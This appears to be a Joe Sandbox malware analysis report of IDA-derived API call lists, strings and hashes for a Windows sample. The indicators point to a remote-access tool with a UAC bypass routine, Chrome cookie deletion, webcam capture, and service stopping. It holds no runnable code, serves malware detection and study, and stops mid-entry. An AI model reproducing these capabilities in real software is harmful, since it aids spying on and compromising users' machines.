                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                  • String ID: C:\Users\user\Desktop\NssBkEQKsI.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                  • API String ID: 3851391207-2442437236
                                                  • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                  • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                  • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                  • int.LIBCPMT ref: 0040FEF2
                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                  • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                  • String ID: H]G
                                                  • API String ID: 2536120697-1717957184
                                                  • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                  • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                  • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                  • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                  APIs
                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                  Strings
                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                  • UserProfile, xrefs: 0040B2B4
                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                  • API String ID: 2018770650-304995407
                                                  • Opcode ID: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                                                  • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                  • Opcode Fuzzy Hash: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                                                  • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\NssBkEQKsI.exe$Rmc-MKYDDH$BG
                                                  • API String ID: 0-3904662399
                                                  • Opcode ID: d50a95e135f0bfdaf236d1bb78b8391e43d4b57b805b0d92c2bf5032378cfc05
                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                  • Opcode Fuzzy Hash: d50a95e135f0bfdaf236d1bb78b8391e43d4b57b805b0d92c2bf5032378cfc05
                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                  APIs
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                  • Sleep.KERNEL32(00002710), ref: 00419F79
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered$`Mw
                                                  • API String ID: 614609389-968373943
                                                  • Opcode ID: debb84a1251a9d4f253e7d3f2da0eb81be5ea948ed7eff08d43fd7d9de811cd2
                                                  • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                  • Opcode Fuzzy Hash: debb84a1251a9d4f253e7d3f2da0eb81be5ea948ed7eff08d43fd7d9de811cd2
                                                  • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                  APIs
                                                  • __allrem.LIBCMT ref: 00439789
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                  • __allrem.LIBCMT ref: 004397BC
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                  • __allrem.LIBCMT ref: 004397F1
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                  • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                  • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                  • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                  • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                  • Opcode Fuzzy Hash: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                  • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __freea$__alloca_probe_16
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 3509577899-3206640213
                                                  • Opcode ID: 2c17f2c40f1def4b87b50b05918a15924d6aa944bacacfbbec5d706d53638fec
                                                  • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                  • Opcode Fuzzy Hash: 2c17f2c40f1def4b87b50b05918a15924d6aa944bacacfbbec5d706d53638fec
                                                  • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                    • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                  • API String ID: 3469354165-462540288
                                                  • Opcode ID: f2dde83fdaeddb7857a1f79ee8cc821e161f0be87270ecbce0ff341b88561a87
                                                  • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                  • Opcode Fuzzy Hash: f2dde83fdaeddb7857a1f79ee8cc821e161f0be87270ecbce0ff341b88561a87
                                                  • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: 8d0c32570e89dd068500cd90fe1776a703b3a192111dc2e8c1051611ff5d3692
                                                  • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                  • Opcode Fuzzy Hash: 8d0c32570e89dd068500cd90fe1776a703b3a192111dc2e8c1051611ff5d3692
                                                  • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                  • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                  • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                  • _free.LIBCMT ref: 00446EF6
                                                  • _free.LIBCMT ref: 00446F1E
                                                  • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                  • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                  • _abort.LIBCMT ref: 00446F3D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                                  • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                  • Opcode Fuzzy Hash: e0442b8656df40b354effc29a53afdc585f42babe91f9aeac9dec78915b16ffb
                                                  • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                                  • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                  • Opcode Fuzzy Hash: 197637b26bbdd00f03ff7db36be43807083bab4a770c68d4e23c4aa016e90e1f
                                                  • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                                  • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                  • Opcode Fuzzy Hash: e355818817006b765bc9d302ee5cf97eebc986756fff16413e45bff3808d062c
                                                  • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                  APIs
                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Enum$InfoQueryValue
                                                  • String ID: [regsplt]$DG
                                                  • API String ID: 3554306468-1089238109
                                                  • Opcode ID: 0bdfa4b9751d6e045e73703d7cb58597d516aa462230dbbc1e67517898b41e87
                                                  • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                  • Opcode Fuzzy Hash: 0bdfa4b9751d6e045e73703d7cb58597d516aa462230dbbc1e67517898b41e87
                                                  • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NssBkEQKsI.exe,00000104), ref: 00442714
                                                  • _free.LIBCMT ref: 004427DF
                                                  • _free.LIBCMT ref: 004427E9
                                                  Strings
                                                  Memory Dump Source
